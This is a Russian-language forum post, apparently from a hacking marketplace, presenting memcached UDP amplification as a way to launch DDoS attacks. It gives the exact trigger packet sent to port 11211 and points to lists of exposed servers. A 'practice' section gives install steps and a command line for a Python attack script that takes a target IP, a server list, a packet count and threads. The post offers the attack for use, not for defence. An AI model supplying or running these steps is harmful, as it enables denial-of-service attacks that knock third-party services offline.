Усиливаем атаки с помощью уязвимости в Memcached

  • Автор темы OneForm
  • Дата начала
  • Просмотров 6760 Просмотров

OneForm

Продавец
93
136
27 Фев 2018
Суть в том, что все вы не взломаете, насколько крутыми вы бы не были, всегда найдется тот, кто круче вас. Для Хакера, DDOS - это последнее, чем он воспользуется. Мне не раз приходилось отбивать атаки и с каждым разом они становились все мощнее. Хакеры уже перестали взламывать, когда они могут устроить ddos атаку. Теперь даже не нужно создавать ботнет, в интернете много уязвимых серверов, которые усиливают атаки. И вот обнаружили новую уязвимость, которая позволяет усиливать атаки. Для того, чтобы совершить атаку достаточно знать ip адреса уязвимых серверов c открытым портом 11211. Таких адресов около 17 тыс. На порт уязвимого сервера отправляется пакет:

Код:

\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
После обработки пакета сервер отвечает большим пакетом до 1mb. Это позволило совершить атаку в 1,3 ТБ/с. Github не справился с атакой, иностранный провайдер тоже, а ведь чтобы запустить такую атаку нужно всего-то пару минут.

Практика

RspESY__LMA.jpg


Для начало нам нужно найти сервера, для этого мы воспользуемся Для просмотра ссылки Войди или Зарегистрируйся .

Или воспользуемся уже готовым списком, который собрали до нас - Для просмотра ссылки Войди или Зарегистрируйся . Скрипт для атаки написан на python 2.7.

Код:

sudo apt-get install python
Далее установим библиотеки:

Код:

python -m pip install datetime
python -m pip install scapy
Итак, запускаем программу:

Код:

python namescript.py -T xx.xx.xx.xx -S file.txt -P 100 -Thread 100
T - Цель
S - Файл с уязвимыми серверами
P - Кол-во отправленных пакетов
Thread - Потоки
X2rGZOdZod0.jpg


Ссылка на программу - Для просмотра ссылки Войди или Зарегистрируйся